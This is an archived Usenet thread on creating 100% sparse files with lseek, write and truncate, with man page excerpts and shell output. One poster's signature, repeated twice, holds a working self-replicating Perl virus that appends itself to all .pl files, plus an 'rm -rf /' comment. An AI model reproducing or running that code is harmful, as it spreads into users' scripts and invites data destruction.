how to make a 100% sparse file?

how to make a 100% sparse file?

Post by phil-news-nos.. » Sun, 14 Jul 2002 02:27:34



How can I make a 100% sparse file of a given size?  What I tried was to
open the new file, then lseek(fd,size,SEEK_CUR).  The file is still 0
bytes in size.  So I tried lseek(fd,size-1,SEEK_CUR) then write(fd,"",1);
and now the file is the full size specified, but clearly the last page
is not sparse.  How can I get it to be 100% sparse?

Oh, I can live with the last page not being sparse, but I had originally
thought the first method was the right way, so I am curious.  If it was
the right way, Linux is broken.

--
-----------------------------------------------------------------
| Phil Howard - KA9WGN |   Dallas   | http://linuxhomepage.com/ |

-----------------------------------------------------------------

 
 
 

how to make a 100% sparse file?

Post by Donald McLachl » Sun, 14 Jul 2002 03:09:35



> How can I make a 100% sparse file of a given size?  What I tried was to
> open the new file, then lseek(fd,size,SEEK_CUR).  The file is still 0
> bytes in size.  So I tried lseek(fd,size-1,SEEK_CUR) then write(fd,"",1);
> and now the file is the full size specified, but clearly the last page
> is not sparse.  How can I get it to be 100% sparse?

> Oh, I can live with the last page not being sparse, but I had originally
> thought the first method was the right way, so I am curious.  If it was
> the right way, Linux is broken.

> --
> -----------------------------------------------------------------
> | Phil Howard - KA9WGN |   Dallas   | http://linuxhomepage.com/ |

> -----------------------------------------------------------------

Does truncate() do what you want?  (man truncate)

--

Communications Research Centre / RNS    Tel     (613) 998-2845
3701 Carling Ave.,                      Fax     (613) 998-9648
Ottawa, Ontario
K2H 8S2
Canada

 
 
 

how to make a 100% sparse file?

Post by Joe Halpi » Sun, 14 Jul 2002 03:11:36



> How can I make a 100% sparse file of a given size?  What I tried was
> to open the new file, then lseek(fd,size,SEEK_CUR).  The file is
> still 0 bytes in size.  So I tried lseek(fd,size-1,SEEK_CUR) then
> write(fd,"",1); and now the file is the full size specified, but
> clearly the last page is not sparse.  How can I get it to be 100%
> sparse?

> Oh, I can live with the last page not being sparse, but I had
> originally thought the first method was the right way, so I am
> curious.  If it was the right way, Linux is broken.

POSIX/SUS says

  "The lseek() function shall allow the file offset to be set beyond
   the end of the existing data in the file. If data is later written
   at this point, subsequent reads of data in the gap shall return
   bytes with the value 0 until data is actually written into the gap.

   The lseek() function shall not, by itself, extend the size of a
   file."

So I don't think linux is broken (at least not in that respect).

The whole point of sparse files is that disk blocks are not allocated
unless data has actually been written to them, so I'm not sure why you
would expect disk blocks to be allocated otherwise. If so, how could
you even *have* sparse files?

Joe

 
 
 

how to make a 100% sparse file?

Post by E. Gibbo » Sun, 14 Jul 2002 03:12:19



>How can I make a 100% sparse file of a given size?  What I tried was to
>open the new file, then lseek(fd,size,SEEK_CUR).  The file is still 0
>bytes in size.  So I tried lseek(fd,size-1,SEEK_CUR) then write(fd,"",1);
>and now the file is the full size specified, but clearly the last page
>is not sparse.  How can I get it to be 100% sparse?

>Oh, I can live with the last page not being sparse, but I had originally
>thought the first method was the right way, so I am curious.  If it was
>the right way, Linux is broken.

I don't have time to mess with test code right now, but: what about
ftruncate()?  I.e., create a not-quite-fully-sparse file as you describe,
then remove the non-sparse portion?

--Ben

--

 
 
 

how to make a 100% sparse file?

Post by Rudolf Polze » Sun, 14 Jul 2002 03:44:49




> >How can I make a 100% sparse file of a given size?  What I tried was to
> >open the new file, then lseek(fd,size,SEEK_CUR).  The file is still 0
> >bytes in size.  So I tried lseek(fd,size-1,SEEK_CUR) then write(fd,"",1);
> >and now the file is the full size specified, but clearly the last page
> >is not sparse.  How can I get it to be 100% sparse?

> I don't have time to mess with test code right now, but: what about
> ftruncate()?  I.e., create a not-quite-fully-sparse file as you describe,
> then remove the non-sparse portion?

Even simpler:

| $ perl -e 'open FH, ">sparse"; truncate FH, 128*2**20; close FH'
| $ ls -lisa sparse
|   49436    0 -rw-r--r--    1 rpolzer  users    134217728 Jul 12 20:42 sparse
             ^                                   ^^^^^^^^^
Is this also true according to SUSv2 and/or POSIX?

--
#!/usr/bin/perl -- WARNING: Be careful. This is a virus!!! # rm -rf /
eval($0=q{$0="\neval(\$0=q{$0});\n";for(<*.pl>){open X,">>$_";print X
$0;close X;}print''.reverse"\nsuriv lreP trohs rehtona tsuJ>RH<\n"});
####################### http://learn.to/quote #######################

 
 
 

how to make a 100% sparse file?

Post by Donald McLachl » Sun, 14 Jul 2002 04:48:18


I have a program called dd.  :-)
I have a program which uses truncate() called truncate.
I have a program which uses lseek(fd,size-1,SEEK_CUR) + write(fd,"",1) called sparse.
I have this program called dd.  :-)
I have a program which uses stat() called stat.
I have a program called ls.  :-)

        janus don> dd bs=1024k if=/dev/zero of=/tmp/junk count=20
        20+0 records in
        20+0 records out
        janus don> ls -ls /tmp/junk
        20504 -rwxr-xr-x   1 don      20971520 Jul 12 15:40 /tmp/junk

So a non sparse 20 Meg file has 20504 block in it.

        janus don> truncate /tmp/junk 0
        janus don> ls -ls /tmp/junk
           0 -rwxr-xr-x   1 don             0 Jul 12 15:43 /tmp/junk
        janus don> truncate /tmp/junk 20971520
        janus don> ls -ls /tmp/junk
          24 -rwxr-xr-x   1 don      20971520 Jul 12 15:43 /tmp/junk

Truncate will "create" a 20 Meg file, but only uses 24 blocks, so it is a
sparse file.

        janus don> rm /tmp/junk
        janus don> sparse /tmp/junk 20971520
        janus don> ls -ls /tmp/junk
          24 -rwxr-xr-x   1 don      20971520 Jul 12 15:45 /tmp/junk

sparse also creates a sparse 20 Meg file.

But why does a 1 byte file use 2 blocks on Solaris?

        janus don> rm /tmp/junk
        janus don> sparse /tmp/junk 1
        janus don> stat /tmp/junk
        /tmp/junk
                st_dev = 30932996
                st_ino = 26
                st_mode = 0o33261
                st_nlink = 1
                st_uid = 100
                st_gid = 100
                st_rdev = 0
                st_size = 1
                st_atime = Fri Jul 12 15:47:27 2002
                st_mtime = Fri Jul 12 15:47:27 2002
                st_ctime = Fri Jul 12 15:47:27 2002
                st_blksize = 8192
        st_blocks = 2

--

Communications Research Centre / RNS    Tel     (613) 998-2845
3701 Carling Ave.,                      Fax     (613) 998-9648
Ottawa, Ontario
K2H 8S2
Canada

 
 
 

how to make a 100% sparse file?

Post by phil-news-nos.. » Sun, 14 Jul 2002 05:04:31




|> How can I make a 100% sparse file of a given size?  What I tried was to
|> open the new file, then lseek(fd,size,SEEK_CUR).  The file is still 0
|> bytes in size.  So I tried lseek(fd,size-1,SEEK_CUR) then write(fd,"",1);
|> and now the file is the full size specified, but clearly the last page
|> is not sparse.  How can I get it to be 100% sparse?
|>
|> Oh, I can live with the last page not being sparse, but I had originally
|> thought the first method was the right way, so I am curious.  If it was
|> the right way, Linux is broken.
|>
|> --
|> -----------------------------------------------------------------
|> | Phil Howard - KA9WGN |   Dallas   | http://linuxhomepage.com/ |

|> -----------------------------------------------------------------
|
| Does truncate() do what you want?  (man truncate)

My man page has:

If the file previously was larger than this size, the extra data is lost.
If the file  previously was shorter, it is unspecified whether the file
is left unchanged or is extended. In the latter

So this was not something that seemed to me like it would do it any
better than lseek().

--
-----------------------------------------------------------------
| Phil Howard - KA9WGN |   Dallas   | http://linuxhomepage.com/ |

-----------------------------------------------------------------

 
 
 

how to make a 100% sparse file?

Post by phil-news-nos.. » Sun, 14 Jul 2002 05:10:03



| The whole point of sparse files is that disk blocks are not allocated
| unless data has actually been written to them, so I'm not sure why you
| would expect disk blocks to be allocated otherwise. If so, how could
| you even *have* sparse files?

I don't want them allocated.  I can have a 1 block sparse file with
a length of many megabytes.  What I want is to have the length there.

This may be caused by another problem, but when the length of the file
is 0, even though I was able to mmap() many megabytes of the file into
the virtual address space, and even though accessing the data in that
address space worked fine, if I accessed it by a call to read(), I get
EFAULT from it.  Simply sticking a piece of code in to store a 0 byte
into that address space (no faults happen as a result of this) before
calling read(), then the read() works fine.  While exploring that I
found that the length is 0 instead of the expected size, and am curious
if the problem is because read() checks the length somewhere along the
way, or because the page is sparse (if I didn't store the 0).

--
-----------------------------------------------------------------
| Phil Howard - KA9WGN |   Dallas   | http://linuxhomepage.com/ |

-----------------------------------------------------------------

 
 
 

how to make a 100% sparse file?

Post by phil-news-nos.. » Sun, 14 Jul 2002 05:11:08



| I don't have time to mess with test code right now, but: what about
| ftruncate()?  I.e., create a not-quite-fully-sparse file as you describe,
| then remove the non-sparse portion?

I don't want to create the file as larger first.

--
-----------------------------------------------------------------
| Phil Howard - KA9WGN |   Dallas   | http://linuxhomepage.com/ |

-----------------------------------------------------------------

 
 
 

how to make a 100% sparse file?

Post by phil-news-nos.. » Sun, 14 Jul 2002 05:14:39





|> >How can I make a 100% sparse file of a given size?  What I tried was to
|> >open the new file, then lseek(fd,size,SEEK_CUR).  The file is still 0
|> >bytes in size.  So I tried lseek(fd,size-1,SEEK_CUR) then write(fd,"",1);
|> >and now the file is the full size specified, but clearly the last page
|> >is not sparse.  How can I get it to be 100% sparse?
|>
|> I don't have time to mess with test code right now, but: what about
|> ftruncate()?  I.e., create a not-quite-fully-sparse file as you describe,
|> then remove the non-sparse portion?
|
| Even simpler:
|
| | $ perl -e 'open FH, ">sparse"; truncate FH, 128*2**20; close FH'
| | $ ls -lisa sparse
| |   49436    0 -rw-r--r--    1 rpolzer  users    134217728 Jul 12 20:42 sparse
|              ^                                   ^^^^^^^^^
| Is this also true according to SUSv2 and/or POSIX?

My man page has:

Truncate causes the file named by path or referenced by fd to be
truncated to at most length bytes in size.  If the file previously was
larger than this size, the extra data is lost.  If the file  previously
was shorter, it is unspecified whether the file is left unchanged or is
extended. In the latter case the extended part reads as zero bytes.
With ftruncate, the file must be open for writing.

The file starts at length 0, then would be extended.  Since this says it
is unspecified if that would happen, I couldn't depend on it.  Maybe it
will work better.  But I want to fully explore this first.  Somewhere I
had gotten the idea that lseek() would do the right thing for sure, but
it doesn't.

--
-----------------------------------------------------------------
| Phil Howard - KA9WGN |   Dallas   | http://linuxhomepage.com/ |

-----------------------------------------------------------------

 
 
 

how to make a 100% sparse file?

Post by phil-news-nos.. » Sun, 14 Jul 2002 05:27:22



| I have a program called dd.  :-)
| I have a program which uses truncate() called truncate.
| I have a program which uses lseek(fd,size-1,SEEK_CUR) + write(fd,"",1) called sparse.
| I have this program called dd.  :-)
| I have a program which uses stat() called stat.
| I have a program called ls.  :-)
|
|       janus don> dd bs=1024k if=/dev/zero of=/tmp/junk count=20
|       20+0 records in
|       20+0 records out
|       janus don> ls -ls /tmp/junk
|       20504 -rwxr-xr-x   1 don      20971520 Jul 12 15:40 /tmp/junk
|
| So a non sparse 20 Meg file has 20504 block in it.

That's 24 blocks MORE than the number of blocks of data (20480).
Pointer blocks?

|       janus don> truncate /tmp/junk 0
|       janus don> ls -ls /tmp/junk
|          0 -rwxr-xr-x   1 don             0 Jul 12 15:43 /tmp/junk
|       janus don> truncate /tmp/junk 20971520
|       janus don> ls -ls /tmp/junk
|         24 -rwxr-xr-x   1 don      20971520 Jul 12 15:43 /tmp/junk
|
| Truncate will "create" a 20 Meg file, but only uses 24 blocks, so it is a
| sparse file.

At least significantly sparse, but maybe not 100% sparse.  Can't be sure.
there are those 24 blocks.  That could be accounted for as pointer blocks
so maybe the data blocks really are sparse.  I wonder if it is possible
to create a genuinely sparse file without the pointer blocks being there,
yet.

|       janus don> rm /tmp/junk
|       janus don> sparse /tmp/junk 20971520
|       janus don> ls -ls /tmp/junk
|         24 -rwxr-xr-x   1 don      20971520 Jul 12 15:45 /tmp/junk
|
| sparse also creates a sparse 20 Meg file.

This is what I do now.

| But why does a 1 byte file use 2 blocks on Solaris?
|
|       janus don> rm /tmp/junk
|       janus don> sparse /tmp/junk 1
|       janus don> stat /tmp/junk
|       /tmp/junk
|               st_dev = 30932996
|               st_ino = 26
|               st_mode = 0o33261
|               st_nlink = 1
|               st_uid = 100
|               st_gid = 100
|               st_rdev = 0
|               st_size = 1
|               st_atime = Fri Jul 12 15:47:27 2002
|               st_mtime = Fri Jul 12 15:47:27 2002
|               st_ctime = Fri Jul 12 15:47:27 2002
|               st_blksize = 8192
|       st_blocks = 2

One block for the data, and one block in a one layer pointer hierarchy.
The locations of the data blocks, indexable by the relative offset,
have to reside somewhere.

The case of 20480 blocks of data would probably need at least 20 blocks
for pointers (assuming a block is 4096 bytes, a pointer is 4 bytes, and
a block has 1024 pointers).  Now where are those 20 pointer blocks
pointed to from?  Just one more block could accomodate a parent with 20
pointers, so 3 blocks is still unaccounted for with that logic.  I
suspect the logic is more complex, where the first part of the file has
a 1 level pointer layering, and the rest has a 2 level pointer layering.
I'm just guessing.  Surely some Solaris docs on UFS explain how it
works inside (I've never looked and I've used Solaris a lot).

--
-----------------------------------------------------------------
| Phil Howard - KA9WGN |   Dallas   | http://linuxhomepage.com/ |

-----------------------------------------------------------------

 
 
 

how to make a 100% sparse file?

Post by Joe Halpi » Sun, 14 Jul 2002 06:11:28




> | The whole point of sparse files is that disk blocks are not
> | allocated unless data has actually been written to them, so I'm
> | not sure why you would expect disk blocks to be allocated
> | otherwise. If so, how could you even *have* sparse files?

> I don't want them allocated.  I can have a 1 block sparse file with
> a length of many megabytes.  What I want is to have the length
> there.

What length? My point is that a sparse file, by definition, doesn't
have any length until something is written to it. The spec for lseek()
confirms that, unless I'm misunderstanding it.

It appears that truncate() has different semantics according to
POSIX/SUS, but I'm not seeing a difference with linux (which I believe
was the platform you asked about (?))

What does it mean to you to create a sparse file? What it means to me
is that no disk space is used (and therefore there is no file length)
until something is acutally written to the file. If lseek() moves the
file pointer to a megabyte, then another lseek() moves the file to 1,
which should be used for the file size, since nothing was written to
the file?

I might be misunderstanding your actual problem. Sorry if so.

Joe

 
 
 

how to make a 100% sparse file?

Post by Barry Margoli » Sun, 14 Jul 2002 06:41:01





>> I don't want them allocated.  I can have a 1 block sparse file with
>> a length of many megabytes.  What I want is to have the length
>> there.

>What length? My point is that a sparse file, by definition, doesn't
>have any length until something is written to it.

I think he means the length shown by "ls -l", and reported by stat(2) in
the stat.st_size member.

--

Genuity, Woburn, MA
*** DON'T SEND TECHNICAL QUESTIONS DIRECTLY TO ME, post them to newsgroups.
Please DON'T copy followups to me -- I'll assume it wasn't posted to the group.

 
 
 

how to make a 100% sparse file?

Post by Rudolf Polze » Sun, 14 Jul 2002 06:40:12



Quote:> My man page has:

> Truncate causes the file named by path or referenced by fd to be
> truncated to at most length bytes in size.  If the file previously was
> larger than this size, the extra data is lost.  If the file  previously
> was shorter, it is unspecified whether the file is left unchanged or is
> extended. In the latter case the extended part reads as zero bytes.
> With ftruncate, the file must be open for writing.

> The file starts at length 0, then would be extended.  Since this says it
> is unspecified if that would happen, I couldn't depend on it.  Maybe it
> will work better.  But I want to fully explore this first.  Somewhere I
> had gotten the idea that lseek() would do the right thing for sure, but
> it doesn't.

Mine:

| TRUNCATE(2)         Linux Programmer's Manual         TRUNCATE(2)
|
| NAME
|        truncate,  ftruncate  -  truncate  a  file  to a specified
|        length
|
| SYNOPSIS
|        #include <unistd.h>
|
|        int truncate(const char *path, off_t length);
|        int ftruncate(int fd, off_t length);
|
| DESCRIPTION
|        The truncate and ftruncate  functions  cause  the  regular
|        file  named by path or referenced by fd to be truncated to
|        a size of precisely length bytes.
|
|        If the file previously was  larger  than  this  size,  the
|        extra  data  is lost.  If the file previously was shorter,
|        it is extended, and the extended part reads as zero bytes.
[...]
| CONFORMING TO
|        4.4BSD,  SVr4  (these function calls first appeared in BSD
|        4.2).  POSIX 1003.1-1996 has ftruncate.  POSIX 1003.1-2001
|        also has truncate, as an XSI extension.
|
|        SVr4   documents   additional  truncate  error  conditions
|        EMFILE, EMULTIHP, ENFILE,  ENOLINK.   SVr4  documents  for
|        ftruncate an additional EAGAIN error condition.
|
| NOTES
|        The  above  description is for XSI-compliant systems.  For
|        non-XSI-compliant systems, the POSIX standard  allows  two
|        behaviours  for  ftruncate  when  length  exceeds the file
|        length (note that truncate is not specified at all in such
|        an  environment):  either returning an error, or extending
|        the file.  (Most Unices follow the XSI requirement.)
|
| SEE ALSO
|        open(2)
|
|                             1998-12-21                TRUNCATE(2)

So you can do the best like this:

if (ftruncate (fd, length))
{
  if (lseek (fd, length - 1, SEEK_SET) == -1)
    return -1;
  if (write (fd, "", 1) != 1)
    return -1;

Quote:}

This will make the file "as sparse as possible": completely if XSI is
followed and incompletely if XSI is not followed, but POSIX is.

--
#!/usr/bin/perl -- WARNING: Be careful. This is a virus!!! # rm -rf /
eval($0=q{$0="\neval(\$0=q{$0});\n";for(<*.pl>){open X,">>$_";print X
$0;close X;}print''.reverse"\nsuriv lreP trohs rehtona tsuJ>RH<\n"});
####################### http://learn.to/quote #######################

 
 
 

how to make a 100% sparse file?

Post by Joe Halpi » Sun, 14 Jul 2002 07:34:07






> >> I don't want them allocated.  I can have a 1 block sparse file with
> >> a length of many megabytes.  What I want is to have the length
> >> there.

> >What length? My point is that a sparse file, by definition, doesn't
> >have any length until something is written to it.

> I think he means the length shown by "ls -l", and reported by
> stat(2) in the stat.st_size member.

That's what I thought he meant as well, but what should that value be?
Given the following program

#include <fcntl.h>
#include <unistd.h>
int main()
{
  int fd = open("/tmp/junk", O_CREAT | O_WRONLY | O_TRUNC, 0644);
  lseek(fd, 1024, SEEK_SET);
  lseek(fd, 1, SEEK_SET);
  close(fd);

Quote:}

What should ls report as the file size?

Joe

 
 
 

1. Make sparse-able files sparse

Hi to all

I would like to save 20% space in our filesystem by making all files
that are by nature sparse (but do hold the full disk-space, I 'd call
then "sparse-able" but not sparse yet), truly sparse in the sense that
they will take much less space (For example du filename and ls -l
filename would show different numbers after you correct for du
printing in KB and ls -l in Bytes). Is there a tool that would find
which files are "sparse-able" and then make them sparse by for example
using cp --sparse etc?
I looked in google web and groups for a program that can find out if a
file is sparse-able but not saved as sparse yet and save it as sparse
but no luck. Am I missing something? I would thing this tool could be
very useful for system administrators etc for saving space (We are
doing image processing and i beleive that around 20% sizewise of files
are sparse in our case).

I am familiar with cp --sparse and rsync --sparse by the way, but i am
looking for a better way than recopying the whole directory.

Stelios

2. Quake II and non-Voodoo OpenGL

3. Q: backup makes sparse files from Oracle databases

4. So where *is* Steve Robins fix for the GNU join -a bug?

5. df shows 100% used, after I removed files, it's still 100% used

6. telnet spacing and linefeeds

7. Would sparse file technique help in deleting initial part of Accounting file?

8. Sparc 1+ diskless boot problem.

9. Making my ATAPI ZIP 100 work

10. how to get the last 100 lines from a file and put into another file

11. Restore may 'sparse' your file.

12. Lockups with loop'ed sparse files on reiserfs?

13. sparse files: ext2 vs reiserfs